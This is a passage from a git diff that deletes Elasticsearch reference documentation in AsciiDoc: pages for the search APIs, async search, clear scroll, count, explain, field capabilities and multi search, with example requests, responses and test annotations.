`total_score` field instead -of using a script. - -[source,console] ----- -GET /my_test_scores_2/_search -{ - "query": { - "term": { - "grad_year": "2099" - } - }, - "sort": [ - { - "total_score": { - "order": "desc" - } - } - ] -} ----- -// TEST[continued] - -//// -[source,console] ----- -DELETE /_ingest/pipeline/my_test_scores_pipeline ----- -// TEST[continued] - -[source,console-result] ----- -{ -"acknowledged": true -} ----- -//// -===== - -We recommend testing and benchmarking any indexing changes before deploying them -in production. - -[discrete] -[[modules-scripting-errors]] -=== Script errors -Elasticsearch returns error details when there is a compliation or runtime -exception. The contents of this response are useful for tracking down the -problem. - -experimental[] - -The contents of `position` are experimental and subject to change. diff --git a/docs/reference/search.asciidoc b/docs/reference/search.asciidoc deleted file mode 100644 index c753dbd6e28..00000000000 --- a/docs/reference/search.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[search]] -== Search APIs - -Search APIs are used to search and aggregate data stored in {es} indices and -data streams. For an overview and related tutorials, see <>. - -Most search APIs support <>, with the -exception of the <>. - -[discrete] -[[core-search-apis]] -=== Core search - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[search-testing-apis]] -=== Search testing - -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[search-template-apis]] -=== Search templates - -* <> -* <> - -[discrete] -[[eql-search-apis]] -=== EQL search - -For an overview of EQL and related tutorials, see <>. - -* <> -* <> -* <> - - -include::search/search.asciidoc[] - -include::search/async-search.asciidoc[] - -include::search/point-in-time-api.asciidoc[] - -include::search/scroll-api.asciidoc[] - -include::search/clear-scroll-api.asciidoc[] - -include::search/search-template.asciidoc[] - -include::search/search-shards.asciidoc[] - -include::search/suggesters.asciidoc[] - -include::search/multi-search.asciidoc[] - -include::eql/eql-search-api.asciidoc[] - -include::eql/get-async-eql-search-api.asciidoc[] - -include::eql/delete-async-eql-search-api.asciidoc[] - -include::search/count.asciidoc[] - -include::search/validate.asciidoc[] - -include::search/explain.asciidoc[] - -include::search/profile.asciidoc[] - -include::search/field-caps.asciidoc[] - -include::search/rank-eval.asciidoc[] diff --git a/docs/reference/search/async-search.asciidoc b/docs/reference/search/async-search.asciidoc deleted file mode 100644 index 72241e23878..00000000000 --- a/docs/reference/search/async-search.asciidoc +++ /dev/null @@ -1,236 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[async-search]] -=== Async search - -The async search API let you asynchronously execute a -search request, monitor its progress, and retrieve partial results -as they become available. - -[[submit-async-search]] -==== Submit async search API - -Executes a search request asynchronously. It accepts the same -parameters and request body as the <>. - -[source,console,id=submit-async-search-date-histogram-example] --------------------------------------------------- -POST /sales*/_async_search?size=0 -{ - "sort": [ - { "date": { "order": "asc" } } - ], - "aggs": { - "sale_date": { - "date_histogram": { - "field": "date", - "calendar_interval": "1d" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/size=0/size=0&wait_for_completion_timeout=10s&keep_on_completion=true/] - -The response contains an identifier of the search being executed. -You can use this ID to later retrieve the search's final results. -The currently available search -results are returned as part of the <> object. - -[source,console-result] --------------------------------------------------- -{ - "id" : "FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=", <1> - "is_partial" : true, <2> - "is_running" : true, <3> - "start_time_in_millis" : 1583945890986, - "expiration_time_in_millis" : 1584377890986, - "response" : { - "took" : 1122, - "timed_out" : false, - "num_reduce_phases" : 0, - "_shards" : { - "total" : 562, <4> - "successful" : 3, <5> - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 157483, <6> - "relation" : "gte" - }, - "max_score" : null, - "hits" : [ ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=/$body.id/] -// TESTRESPONSE[s/"is_partial" : true/"is_partial": $body.is_partial/] -// TESTRESPONSE[s/"is_running" : true/"is_running": $body.is_running/] -// TESTRESPONSE[s/1583945890986/$body.start_time_in_millis/] -// TESTRESPONSE[s/1584377890986/$body.expiration_time_in_millis/] -// TESTRESPONSE[s/"took" : 1122/"took": $body.response.took/] -// TESTRESPONSE[s/"num_reduce_phases" : 0,//] -// TESTRESPONSE[s/"total" : 562/"total": $body.response._shards.total/] -// TESTRESPONSE[s/"successful" : 3/"successful": $body.response._shards.successful/] -// TESTRESPONSE[s/"value" : 157483/"value": $body.response.hits.total.value/] -// TESTRESPONSE[s/"relation" : "gte"/"relation": $body.response.hits.total.relation/] -// TESTRESPONSE[s/"hits" : \[ \]\n\s\s\s\s\}/"hits" : \[\]},"aggregations": $body.response.aggregations/] - -<1> Identifier of the async search that can be used to monitor its progress, -retrieve its results, and/or delete it -<2> When the query is no longer running, indicates whether the search failed -or was successfully completed on all shards. While the query is being -executed, `is_partial` is always set to `true` -<3> Whether the search is still being executed or it has completed -<4> How many shards the search will be executed on, overall -<5> How many shards have successfully completed the search -<6> How many documents are currently matching the query, which belong to the -shards that have already completed the search - -NOTE: Although the query is no longer running, hence `is_running` is set to -`false`, results may be partial. That happens in case the search failed after -some shards returned their results, or when the node that is coordinating the - async search dies. - -It is possible to block and wait until the search is completed up to a certain -timeout by providing the `wait_for_completion_timeout` parameter, which -defaults to `1` second. When the async search completes within such timeout, -the response won't include the ID as the results are not stored in the cluster. -The `keep_on_completion` parameter, which defaults to `false`, can be set to -`true` to request that results are stored for later retrieval also when the -search completes within the `wait_for_completion_timeout`. - -You can also specify how long the async search needs to be -available through the `keep_alive` parameter, which defaults to `5d` (five days). -Ongoing async searches and any saved search results are deleted after this -period. - -NOTE: When the primary sort of the results is an indexed field, shards get -sorted based on minimum and maximum value that they hold for that field, -hence partial results become available following the sort criteria that -was requested. - -The submit async search API supports the same <> -as the search API, though some have different default values: - -* `batched_reduce_size` defaults to `5`: this affects how often partial results -become available, which happens whenever shard results are reduced. A partial -reduction is performed every time the coordinating node has received a certain -number of new shard responses (`5` by default). -* `request_cache` defaults to `true` -* `pre_filter_shard_size` defaults to `1` and cannot be changed: this is to -enforce the execution of a pre-filter roundtrip to retrieve statistics from -each shard so that the ones that surely don't hold any document matching the -query get skipped. -* `ccs_minimize_roundtrips` defaults to `false`, which is also the only -supported value - -WARNING: Async search does not support <> -nor search requests that only include the <>. -{ccs} is supported only with <> -set to `false`. - -[[get-async-search]] -==== Get async search - -The get async search API retrieves the results of a previously submitted -async search request given its id. If the {es} {security-features} are enabled. -the access to the results of a specific async search is restricted to the user -that submitted it in the first place. - -[source,console,id=get-async-search-date-histogram-example] --------------------------------------------------- -GET /_async_search/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc= --------------------------------------------------- -// TEST[continued s/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=/\${body.id}/] - -[source,console-result] --------------------------------------------------- -{ - "id" : "FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=", - "is_partial" : true, <1> - "is_running" : true, <2> - "start_time_in_millis" : 1583945890986, - "expiration_time_in_millis" : 1584377890986, <3> - "response" : { - "took" : 12144, - "timed_out" : false, - "num_reduce_phases" : 46, <4> - "_shards" : { - "total" : 562, <5> - "successful" : 188, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 456433, - "relation" : "eq" - }, - "max_score" : null, - "hits" : [ ] - }, - "aggregations" : { <6> - "sale_date" : { - "buckets" : [] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=/$body.id/] -// TESTRESPONSE[s/"is_partial" : true/"is_partial" : false/] -// TESTRESPONSE[s/"is_running" : true/"is_running" : false/] -// TESTRESPONSE[s/1583945890986/$body.start_time_in_millis/] -// TESTRESPONSE[s/1584377890986/$body.expiration_time_in_millis/] -// TESTRESPONSE[s/"took" : 12144/"took": $body.response.took/] -// TESTRESPONSE[s/"total" : 562/"total": $body.response._shards.total/] -// TESTRESPONSE[s/"successful" : 188/"successful": $body.response._shards.successful/] -// TESTRESPONSE[s/"value" : 456433/"value": $body.response.hits.total.value/] -// TESTRESPONSE[s/"buckets" : \[\]/"buckets": $body.response.aggregations.sale_date.buckets/] -// TESTRESPONSE[s/"num_reduce_phases" : 46,//] - -<1> When the query is no longer running, indicates whether the search failed -or was successfully completed on all shards. While the query is being -executed, `is_partial` is always set to `true` -<2> Whether the search is still being executed or it has completed -<3> When the async search will expire -<4> Indicates how many reductions of the results have been performed. If this -number increases compared to the last retrieved results, you can expect -additional results included in the search response -<5> Indicates how many shards have executed the query. Note that in order for -shard results to be included in the search response, they need to be reduced -first. -<6> Partial aggregations results, coming from the shards that have already -completed the execution of the query. - -The `wait_for_completion_timeout` parameter can also be provided when calling -the Get Async Search API, in order to wait for the search to be completed up -until the provided timeout. Final results will be returned if available before -the timeout expires, otherwise the currently available results will be -returned once the timeout expires. By default no timeout is set meaning that -the currently available results will be returned without any additional wait. - -The `keep_alive` parameter specifies how long the async search should be -available in the cluster. When not specified, the `keep_alive` set with the -corresponding submit async request will be used. Otherwise, it is possible to -override such value and extend the validity of the request. When this period -expires, the search, if still running, is cancelled. If the search is -completed, its saved results are deleted. - -[[delete-async-search]] -==== Delete async search - -You can use the delete async search API to manually delete an async search -by ID. If the search is still running, the search request will be cancelled. -Otherwise, the saved search results are deleted. - -[source,console,id=delete-async-search-date-histogram-example] --------------------------------------------------- -DELETE /_async_search/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc= --------------------------------------------------- -// TEST[continued s/FmRldE8zREVEUzA2ZVpUeGs2ejJFUFEaMkZ5QTVrSTZSaVN3WlNFVmtlWHJsdzoxMDc=/\${body.id}/] diff --git a/docs/reference/search/clear-scroll-api.asciidoc b/docs/reference/search/clear-scroll-api.asciidoc deleted file mode 100644 index a005babfd1b..00000000000 --- a/docs/reference/search/clear-scroll-api.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[[clear-scroll-api]] -=== Clear scroll API -++++ -Clear scroll -++++ - -Clears the search context and results for a -<>. - -//// -[source,console] --------------------------------------------------- -GET /_search?scroll=1m -{ - "size": 1, - "query": { - "match_all": {} - } -} --------------------------------------------------- -// TEST[setup:my_index] -//// - -[source,console] --------------------------------------------------- -DELETE /_search/scroll -{ - "scroll_id" : "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==" -} --------------------------------------------------- -// TEST[continued] -// TEST[s/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==/$body._scroll_id/] - -[[clear-scroll-api-request]] -==== {api-request-title} - -`DELETE /_search/scroll/` -deprecated:[7.0.0] - -`DELETE /_search/scroll` - -[[clear-scroll-api-path-params]] -==== {api-path-parms-title} - -``:: -deprecated:[7.0.0] -(Optional, string) -Comma-separated list of scroll IDs to clear. To clear all scroll IDs, use `_all`. -+ -IMPORTANT: Scroll IDs can be long. We recommend only specifying -scroll IDs using the <>. - -[[clear-scroll-api-query-params]] -==== {api-query-parms-title} - -`scroll_id`:: -deprecated:[7.0.0] -(Optional, string) -Comma-separated list of scroll IDs to clear. To clear all scroll IDs, use `_all`. -+ -IMPORTANT: Scroll IDs can be long. We recommend only specifying -scroll IDs using the <>. - -[role="child_attributes"] -[[clear-scroll-api-request-body]] -==== {api-request-body-title} - -[[clear-scroll-api-scroll-id-param]] -`scroll_id`:: -(Required, string or array of strings) -Scroll IDs to clear. To clear all scroll IDs, use `_all`. - -[role="child_attributes"] -[[clear-scroll-api-response-body]] -==== {api-response-body-title} - -`succeeded`:: -(Boolean) -If `true`, the request succeeded. This does not indicate whether any scrolling -search requests were cleared. - -`num_freed`:: -(integer) -Number of scrolling search requests cleared. \ No newline at end of file diff --git a/docs/reference/search/count.asciidoc b/docs/reference/search/count.asciidoc deleted file mode 100644 index 07bb447c425..00000000000 --- a/docs/reference/search/count.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ -[[search-count]] -=== Count API - -Gets the number of matches for a search query. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_count?q=user:kimchy --------------------------------------------------- -// TEST[setup:my_index] - -NOTE: The query being sent in the body must be nested in a `query` key, same as -the <> works. - - -[[search-count-api-request]] -==== {api-request-title} - -`GET //_count` - - -[[search-count-api-desc]] -==== {api-description-title} - -The count API allows you to execute a query and get the number of matches for -that query. The query can either -be provided using a simple query string as a parameter, or using the -<> defined within the request body. - -The count API supports <>. You can run a single -count API search across multiple data streams and indices. - -The operation is broadcast across all shards. For each shard id group, a replica -is chosen and executed against it. This means that replicas increase the -scalability of count. - - -[[search-count-api-path-params]] -==== {api-path-parms-title} - -``:: - -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[search-count-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=ignore_throttled] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -`min_score`:: -(Optional, float) - Sets the minimum `_score` value that documents must have to be included in the - result. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] - - -[[search-count-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=query] - - -[[search-count-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1?refresh -{ - "user.id": "kimchy" -} - -GET /my-index-000001/_count?q=user:kimchy - -GET /my-index-000001/_count -{ - "query" : { - "term" : { "user.id" : "kimchy" } - } -} --------------------------------------------------- - -Both examples above do the same: count the number of documents in -`my-index-000001` with a `user.id` of `kimchy`. The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "count": 1, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - } -} --------------------------------------------------- - -The query is optional, and when not provided, it will use `match_all` to -count all the docs. diff --git a/docs/reference/search/explain.asciidoc b/docs/reference/search/explain.asciidoc deleted file mode 100644 index 61ee2d7aa9a..00000000000 --- a/docs/reference/search/explain.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[search-explain]] -=== Explain API - -Returns information about why a specific document matches (or doesn't match) a -query. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_explain/0 -{ - "query" : { - "match" : { "message" : "elasticsearch" } - } -} --------------------------------------------------- -// TEST[setup:messages] - - -[[search-explain-api-request]] -==== {api-request-title} - -`GET //_explain/` - -`POST //_explain/` - -[[search-explain-api-desc]] -==== {api-description-title} - -The explain API computes a score explanation for a query and a specific -document. This can give useful feedback whether a document matches or -didn't match a specific query. - - -[[search-explain-api-path-params]] -==== {api-path-parms-title} - -``:: - (Required, integer) Defines the document ID. - -``:: -+ --- -(Required, string) -Index names used to limit the request. - -Only a single index name can be provided to this parameter. --- - - -[[search-explain-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - -`stored_fields`:: - (Optional, string) A comma-separated list of stored fields to return in the - response. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - - -[[search-explain-api-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=query] - - -[[search-explain-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /my-index-000001/_explain/0 -{ - "query" : { - "match" : { "message" : "elasticsearch" } - } -} --------------------------------------------------- -// TEST[setup:messages] - - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_index":"my-index-000001", - "_type":"_doc", - "_id":"0", - "matched":true, - "explanation":{ - "value":1.6943598, - "description":"weight(message:elasticsearch in 0) [PerFieldSimilarity], result of:", - "details":[ - { - "value":1.6943598, - "description":"score(freq=1.0), computed as boost * idf * tf from:", - "details":[ - { - "value":2.2, - "description":"boost", - "details":[] - }, - { - "value":1.3862944, - "description":"idf, computed as log(1 + (N - n + 0.5) / (n + 0.5)) from:", - "details":[ - { - "value":1, - "description":"n, number of documents containing term", - "details":[] - }, - { - "value":5, - "description":"N, total number of documents with field", - "details":[] - } - ] - }, - { - "value":0.5555556, - "description":"tf, computed as freq / (freq + k1 * (1 - b + b * dl / avgdl)) from:", - "details":[ - { - "value":1.0, - "description":"freq, occurrences of term within document", - "details":[] - }, - { - "value":1.2, - "description":"k1, term saturation parameter", - "details":[] - }, - { - "value":0.75, - "description":"b, length normalization parameter", - "details":[] - }, - { - "value":3.0, - "description":"dl, length of field", - "details":[] - }, - { - "value":5.4, - "description":"avgdl, average length of field", - "details":[] - } - ] - } - ] - } - ] - } -} --------------------------------------------------- - - -There is also a simpler way of specifying the query via the `q` parameter. The -specified `q` parameter value is then parsed as if the `query_string` query was -used. Example usage of the `q` parameter in the -explain API: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_explain/0?q=message:search --------------------------------------------------- -// TEST[setup:messages] - - -The API returns the same result as the previous request. diff --git a/docs/reference/search/field-caps.asciidoc b/docs/reference/search/field-caps.asciidoc deleted file mode 100644 index d0024c03a34..00000000000 --- a/docs/reference/search/field-caps.asciidoc +++ /dev/null @@ -1,266 +0,0 @@ -[[search-field-caps]] -=== Field capabilities API -++++ -Field capabilities -++++ - - -Allows you to retrieve the capabilities of fields among multiple indices. -For data streams, the API returns field capabilities among the stream's backing -indices. - -[source,console] --------------------------------------------------- -GET /_field_caps?fields=rating --------------------------------------------------- - - -[[search-field-caps-api-request]] -==== {api-request-title} - -`GET /_field_caps?fields=` - -`POST /_field_caps?fields=` - -`GET //_field_caps?fields=` - -`POST //_field_caps?fields=` - - -[[search-field-caps-api-desc]] -==== {api-description-title} - - -The field capabilities API returns the information about the capabilities of -fields among multiple indices. - - -[[search-field-caps-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[search-field-caps-api-query-params]] -==== {api-query-parms-title} - -`fields`:: -(Required, string) -Comma-separated list of fields to retrieve capabilities for. Wildcard (`*`) -expressions are supported. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ --- -Defaults to `open`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`include_unmapped`:: - (Optional, Boolean) If `true`, unmapped fields are included in the response. - Defaults to `false`. - -[[search-field-caps-api-request-body]] -==== {api-request-body-title} - -`index_filter`:: -(Optional, <> Allows to filter indices if the provided -query rewrites to `match_none` on every shard. - -[[search-field-caps-api-response-body]] -==== {api-response-body-title} - - -The types used in the response describe _families_ of field types. -Normally a type family is the same as the field type declared in the mapping, -but to simplify matters certain field types that behave identically are -described using a type family. For example, `keyword`, `constant_keyword` and `wildcard` -field types are all described as the `keyword` type family. - - - -`searchable`:: - Whether this field is indexed for search on all indices. - -`aggregatable`:: - Whether this field can be aggregated on all indices. - -`indices`:: - The list of indices where this field has the same type family, or null if all indices - have the same type family for the field. - -`non_searchable_indices`:: - The list of indices where this field is not searchable, or null if all indices - have the same definition for the field. - -`non_aggregatable_indices`:: - The list of indices where this field is not aggregatable, or null if all - indices have the same definition for the field. - -`meta`:: - Merged metadata across all indices as a map of string keys to arrays of values. - A value length of 1 indicates that all indices had the same value for this key, - while a length of 2 or more indicates that not all indices had the same value - for this key. - - -[[search-field-caps-api-example]] -==== {api-examples-title} - - -The request can be restricted to specific data streams and indices: - -[source,console] --------------------------------------------------- -GET my-index-000001/_field_caps?fields=rating --------------------------------------------------- -// TEST[setup:my_index] - - -The next example API call requests information about the `rating` and the -`title` fields: - -[source,console] --------------------------------------------------- -GET _field_caps?fields=rating,title --------------------------------------------------- - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "indices": [ "index1", "index2", "index3", "index4", "index5" ], - "fields": { - "rating": { <1> - "long": { - "searchable": true, - "aggregatable": false, - "indices": [ "index1", "index2" ], - "non_aggregatable_indices": [ "index1" ] <2> - }, - "keyword": { - "searchable": false, - "aggregatable": true, - "indices": [ "index3", "index4" ], - "non_searchable_indices": [ "index4" ] <3> - } - }, - "title": { <4> - "text": { - "searchable": true, - "aggregatable": false - - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:historically skipped] - -<1> The field `rating` is defined as a long in `index1` and `index2` -and as a `keyword` in `index3` and `index4`. -<2> The field `rating` is not aggregatable in `index1`. -<3> The field `rating` is not searchable in `index4`. -<4> The field `title` is defined as `text` in all indices. - - -By default unmapped fields are ignored. You can include them in the response by -adding a parameter called `include_unmapped` in the request: - -[source,console] --------------------------------------------------- -GET _field_caps?fields=rating,title&include_unmapped --------------------------------------------------- - -In which case the response will contain an entry for each field that is present -in some indices but not all: - -[source,console-result] --------------------------------------------------- -{ - "indices": [ "index1", "index2", "index3" ], - "fields": { - "rating": { - "long": { - "searchable": true, - "aggregatable": false, - "indices": [ "index1", "index2" ], - "non_aggregatable_indices": [ "index1" ] - }, - "keyword": { - "searchable": false, - "aggregatable": true, - "indices": [ "index3", "index4" ], - "non_searchable_indices": [ "index4" ] - }, - "unmapped": { <1> - "indices": [ "index5" ], - "searchable": false, - "aggregatable": false - } - }, - "title": { - "text": { - "indices": [ "index1", "index2", "index3", "index4" ], - "searchable": true, - "aggregatable": false - }, - "unmapped": { <2> - "indices": [ "index5" ], - "searchable": false, - "aggregatable": false - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:historically skipped] - -<1> The `rating` field is unmapped` in `index5`. -<2> The `title` field is unmapped` in `index5`. - -It is also possible to filter indices with a query: - -[source,console] --------------------------------------------------- -POST my-index-*/_field_caps?fields=rating -{ - "index_filter": { - "range": { - "@timestamp": { - "gte": "2018" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - - -In which case indices that rewrite the provided filter to `match_none` on every shard -will be filtered from the response. - --- -[IMPORTANT] -==== -The filtering is done on a best-effort basis, it uses index statistics and mappings -to rewrite queries to `match_none` instead of fully executing the request. -For instance a `range` query over a `date` field can rewrite to `match_none` -if all documents within a shard (including deleted documents) are outside -of the provided range. -However, not all queries can rewrite to `match_none` so this API may return -an index even if the provided filter matches no document. -==== --- diff --git a/docs/reference/search/multi-search.asciidoc b/docs/reference/search/multi-search.asciidoc deleted file mode 100644 index 798f1dc30fc..00000000000 --- a/docs/reference/search/multi-search.asciidoc +++ /dev/null @@ -1,412 +0,0 @@ -[[search-multi-search]] -=== Multi search API -++++ -Multi search -++++ - -Executes several searches with a single API request. - -[source,console] --------------------------------------------------- -GET my-index-000001/_msearch -{ } -{"query" : {"match" : { "message": "this is a test"}}} -{"index": "my-index-000002"} -{"query" : {"match_all" : {}}} --------------------------------------------------- -// TEST[setup:my_index] - -[[search-multi-search-api-request]] -==== {api-request-title} - -`GET //_msearch` - - -[[search-multi-search-api-desc]] -==== {api-description-title} - -The multi search API executes several searches from a single API request. -The format of the request is similar to the bulk API format and makes use -of the newline delimited JSON (NDJSON) format. - -The structure is as follows: - -[source,js] --------------------------------------------------- -header\n -body\n -header\n -body\n --------------------------------------------------- -// NOTCONSOLE - -This structure is specifically optimized to reduce parsing if a specific search -ends up redirected to another node. - -[IMPORTANT] -==== -The final line of data must end with a newline character `\n`. Each newline -character may be preceded by a carriage return `\r`. When sending requests to -this endpoint the `Content-Type` header should be set to `application/x-ndjson`. -==== - -[[search-multi-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -+ -This list acts as a fallback if a search in the request body does not specify an -`index` target. -+ -Wildcard (`*`) expressions are supported. To search all data streams and indices -in a cluster, omit this parameter or use `_all` or `*`. - -[[search-multi-search-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] - -`ccs_minimize_roundtrips`:: -(Optional, Boolean) -If `true`, network roundtrips between the coordinating node and remote clusters -are minimized for {ccs} requests. Defaults to `true`. See -<>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`ignore_throttled`:: -(Optional, Boolean) -If `true`, concrete, expanded or aliased indices are ignored when frozen. -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`max_concurrent_searches`:: -(Optional, integer) -Maximum number of concurrent searches the multi search API can execute. Defaults -to +max(1, (# of <> * min(<>, 10)))+. - -`max_concurrent_shard_requests`:: -+ --- -(Optional, integer) -Maximum number of concurrent shard requests that each sub-search request -executes per node. Defaults to `5`. - -You can use this parameter to prevent a request from overloading a cluster. For -example, a default request hits all data streams and indices in a cluster. This -could cause shard request rejections if the number of shards per node is high. - -In certain scenarios, parallelism isn't achieved through concurrent requests. In -those cases, a low value in this parameter could result in poor performance. -For example, in an environment where a very low number of concurrent search -requests are expected, a higher value in this parameter may improve performance. --- - -`pre_filter_shard_size`:: -(Optional, integer) -Defines a threshold that enforces a pre-filter roundtrip to prefilter search -shards based on query rewriting if the number of shards the search request -expands to exceeds the threshold. This filter roundtrip can limit the number of -shards significantly if for instance a shard can not match any documents based -on its rewrite method i.e., if date filters are mandatory to match but the -shard bounds and the query are disjoint. -When unspecified, the pre-filter phase is executed if any of these -conditions is met: - - The request targets more than `128` shards. - - The request targets one or more read-only index. - - The primary sort of the query targets an indexed field. - -`rest_total_hits_as_int`:: -(Optional, Boolean) -If `true`, `hits.total` are returned as an integer in the -response. Defaults to `false`, which returns an object. - -`routing`:: -(Optional, string) -Custom <> used to route search operations -to a specific shard. - -`search_type`:: -+ --- -(Optional, string) -Indicates whether global term and document frequencies should be used when -scoring returned documents. - -Options are: - -`query_then_fetch`:: -(default) -Documents are scored using local term and document frequencies for the shard. -This is usually faster but less accurate. - -`dfs_query_then_fetch`:: -Documents are scored using global term and document frequencies across all -shards. This is usually slower but more accurate. --- - -`typed_keys`:: -(Optional, Boolean) -Specifies whether aggregation and suggester names should be prefixed by their -respective types in the response. - -[[search-multi-search-api-request-body]] -==== {api-request-body-title} - -The request body contains a newline-delimited list of search `

` and -search `` objects. - -`
`:: -+ --- -(Required, object) -Contains parameters used to limit or change the subsequent search body request. - -This object is required for each search body but can be empty (`{}`) or a blank -line. --- - -`allow_no_indices`::: -(Optional, Boolean) -If `true`, the request does *not* return an error if a wildcard expression or -`_all` value retrieves only missing or closed indices. -+ -This parameter also applies to <> that point to a -missing or closed index. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`ignore_unavailable`::: -(Optional, Boolean) If `true`, documents from missing or closed indices are not -included in the response. Defaults to `false`. - -`index`::: -(Optional, string or array of strings) -Data streams, indices, and index aliases to search. Wildcard (`*`) expressions -are supported. You can specify multiple targets as an array. -+ -If this parameter is not specified, the `` request path parameter -is used as a fallback. - -`preference`::: -(Optional, string) -Node or shard used to perform the search. Random by default. - -`request_cache`::: -(Optional, Boolean) -If `true`, the request cache can be used for this search. Defaults to -index-level settings. See <>. - -`routing`::: -(Optional, string) -Custom <> used to route search operations -to a specific shard. - -`search_type`::: -+ --- -(Optional, string) -Indicates whether global term and document frequencies should be used when -scoring returned documents. - -Options are: - -`query_then_fetch`:: -(default) -Documents are scored using local term and document frequencies for the shard. -This is usually faster but less accurate. - -`dfs_query_then_fetch`:: -Documents are scored using global term and document frequencies across all -shards. This is usually slower but more accurate. --- - -``:: -(Optional, object) -Contains parameters for a search request: - -`aggregations`::: -(Optional, <>) -Aggregations you wish to run during the search. See <>. - -`query`::: -(Optional, <>) Query you wish to run during the -search. Hits matching this query are returned in 